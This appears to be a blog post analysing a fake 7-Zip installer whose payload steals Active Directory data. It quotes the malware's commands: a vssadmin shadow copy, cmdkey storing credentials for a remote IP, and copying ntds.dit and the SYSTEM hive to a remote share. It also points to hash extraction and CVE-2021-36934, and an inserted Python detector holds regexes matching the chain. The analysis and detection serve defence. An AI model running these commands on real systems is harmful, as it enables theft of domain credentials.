Using 7-Zip to extract a fake 7-Zip installer

I stumbled upon an interesting file on Any.run. The file in question is bff1fc0a497f275c6caf0d87eb680dc807639c9e. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it’s actually a Nullsoft installer:

A quick search reveals that one way to extract the files inside is by using 7-Zip. Opening it reveals the real 7-Zip and a file called payload.exe.

Let’s analyze payload.exe. First thing we do is to check the strings:

Definitely not what you’d expect to see in a clean file. Let’s disassemble it and see what’s going on.

The WinMain function starts with a call to the system API to execute the command vssadmin create shadow /for=C: >nul 2>&1. This creates a shadow copy of the C: drive. This is usually done to make it easier to copy sensitive files that are otherwise locked while Windows is running.

Let’s analyze the code further:

Our assumption was correct. There are 4 more calls to the system API.

The first one uses cmdkey to store (add) a network credential in the Windows Credential Manager. The command that will be executed looks like this:

cmdkey /add:192.76.28.19 /user:thr34t /pass:MyThreatPassword123+

Next, the malware tries to copy the files ntds.dit and SYSTEM to \\192.76.29.19\work\DC01 and afterwards deletes the saved credentials.

A whois lookup on 192.76.28.19 points to a system that appears to belong to the University of Oxford.
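The command chain above (shadow copy, cmdkey /add, copy of ntds.dit and SYSTEM to a share, cmdkey /delete) is a good sequence to hunt for in process-creation logs. The following is an added example and not code from the original post: it correlates constructed Sysmon/4688-style events per process and flags only processes that both create a shadow copy and copy the AD database or SYSTEM hive to a UNC path. The event layout, the documentation IP and the shadow-copy paths are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events (shape loosely follows Sysmon Event ID 1 /
# Security 4688 "CommandLine"); the remote host is a documentation address.
SAMPLE_EVENTS = [
    {"pid": 4100, "cmd": "cmd.exe /c vssadmin create shadow /for=C: >nul 2>&1"},
    {"pid": 4100, "cmd": "cmd.exe /c cmdkey /add:203.0.113.10 /user:op /pass:REDACTED"},
    {"pid": 4100, "cmd": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                         r"\Windows\NTDS\ntds.dit \\203.0.113.10\work\DC01\ntds.dit"},
    {"pid": 4100, "cmd": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                         r"\Windows\System32\config\SYSTEM \\203.0.113.10\work\DC01\SYSTEM"},
    {"pid": 4100, "cmd": "cmd.exe /c cmdkey /delete:203.0.113.10"},
    # Benign noise: a backup job creating a shadow copy, and an ordinary UNC copy.
    {"pid": 5120, "cmd": "vssadmin create shadow /for=C:"},
    {"pid": 6200, "cmd": r"copy C:\temp\report.docx \\fileserver\share\report.docx"},
]

# One regex per stage of the chain seen in payload.exe.
STAGES = {
    "shadow_copy": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "cred_add":    re.compile(r"\bcmdkey(\.exe)?\s+/add:", re.I),
    # ntds.dit or the SYSTEM hive followed by a UNC destination (\\host\share).
    "ad_db_exfil": re.compile(r"(ntds\.dit|config\\SYSTEM)\b.*\\\\[\w.\-]+\\", re.I),
    "cred_delete": re.compile(r"\bcmdkey(\.exe)?\s+/delete:", re.I),
}


def detect(events):
    """Return {pid: [stages in first-seen order]} for processes that created a
    shadow copy AND copied ntds.dit or the SYSTEM hive to a UNC path."""
    seen = defaultdict(list)
    for ev in events:
        for name, rx in STAGES.items():
            if rx.search(ev["cmd"]) and name not in seen[ev["pid"]]:
                seen[ev["pid"]].append(name)
    return {pid: stages for pid, stages in seen.items()
            if {"shadow_copy", "ad_db_exfil"} <= set(stages)}


if __name__ == "__main__":
    for pid, stages in detect(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid}: NTDS dump chain, stages={' -> '.join(stages)}")
```

Requiring both the shadow copy and the ntds.dit/SYSTEM copy keeps a lone vssadmin call from a backup job from alerting, while the cmdkey stages are recorded as extra context.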

Let’s see what those files are good for.

  • ntds.dit is the core database file for Active Directory Domain Services (AD DS) in Windows Server.
  • SYSTEM is a registry hive. It can be used to decrypt the password hashes stored in ntds.dit.

From here it’s relatively easy to get those hashes. One example is by using secretsdump.py from Impacket.

Now, you may ask yourself how come everyone has access to these files? Well, usually regular users don’t. But that’s where CVE-2021-36934 comes into play (or another elevation of privilege vulnerability). That’s why some detections on VirusTotal have this CVE in their name.

Hopefully you had fun reading this!